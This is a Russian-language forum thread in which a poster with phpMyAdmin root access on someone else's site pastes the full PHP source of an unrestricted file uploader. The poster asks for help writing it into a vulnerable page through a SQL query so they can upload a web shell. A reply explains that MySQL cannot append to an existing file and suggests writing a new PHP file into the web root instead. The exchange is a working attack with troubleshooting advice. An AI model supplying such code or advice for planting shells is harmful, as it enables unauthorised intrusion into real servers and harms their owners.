http://yadi.sk/d/Ez4guzZ9JkuAy вот ссылка на видео так сказать с наглядной проблемой Значит непосредственно перейдём к проблеме У меня есть доступ к phpmyadmin root пользователю Я значит создаю новую базу, таблицу и вписываю туда такой код <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>ZaraByte File Uploader</title> <link href="style/style.css" rel="stylesheet" type="text/css" /> </head> <body> <?php $myUpload = new maxUpload(); //$myUpload->setUploadLocation(getcwd().DIRECTORY_SEPARATOR); $myUpload->uploadFile(); ?> <?php /************************************************* * ZaraByte File Uploader * * Version: 1.0 * Date: 2009-09-29 * ****************************************************/ class maxUpload{ var $uploadLocation; /** * Constructor to initialize class varaibles * The uploadLocation will be set to the actual * working directory * * @return maxUpload */ function maxUpload(){ $this->uploadLocation = getcwd().DIRECTORY_SEPARATOR; } /** * This function sets the directory where to upload the file * In case of Windows server use the form: c:\\temp\\ * In case of Unix server use the form: /tmp/ * * @param String Directory where to store the files */ function setUploadLocation($dir){ $this->uploadLocation = $dir; } function showUploadForm($msg='',$error=''){ ?> <div id="container"> <div id="header"><div id="header_left"></div> <div id="header_main">ZaraByte's File Uploader</div><div id="header_right"></div></div> <div id="content"> <?php if ($msg != ''){ echo '<p class="msg">'.$msg.'</p>'; } else if ($error != ''){ echo '<p class="emsg">'.$error.'</p>'; } ?> <form action="" method="post" enctype="multipart/form-data" > <center> <label>File: <input name="myfile" type="file" size="30" /> </label> <label> <input type="submit" name="submitBtn" class="sbtn" value="Upload" /> </label> </center> </form> </div> <div id="footer"><a href="http://www.zarabyte.com" target="_blank">ZaraByte File Uploader</a></div> </div> <?php } function uploadFile(){ if (!isset($_POST['submitBtn'])){ $this->showUploadForm(); } else { $msg = ''; $error = ''; //Check destination directory if (!file_exists($this->uploadLocation)){ $error = "The target directory doesn't exists!"; } else if (!is_writeable($this->uploadLocation)) { $error = "The target directory is not writeable!"; } else { $target_path = $this->uploadLocation . basename( $_FILES['myfile']['name']); if(@move_uploaded_file($_FILES['myfile']['tmp_name'], $target_path)) { $msg = basename( $_FILES['myfile']['name']). " was uploaded successfully!"; } else{ $error = "The upload process failed!"; } } $this->showUploadForm($msg,$error); } } } ?> </body> на видео видно и у меня не выполняется sql запрос с помошью которого из созданой мною таблицей с кодо, чтобы это всё дело добавилось к дырявой странице и я мог залить шелл помогите решить проблему пожалста
прикол этого кода в том что если удастся его добавить к коду дырявой страницы то есть http://www.хххххх.ru/units/base.php то там появится upload для лучшего понятия ситуации советую посмотреть видео
Вы пытаетесь добавить код к существующему файлу? Mysql такого не умеет. Создавайте новый файл. В тексте ошибки же написано "файл уже существует". Попробуйте сохранить скажем в "/var/www/siltd/units/base2.php" Если хватит прав все будет отлично.
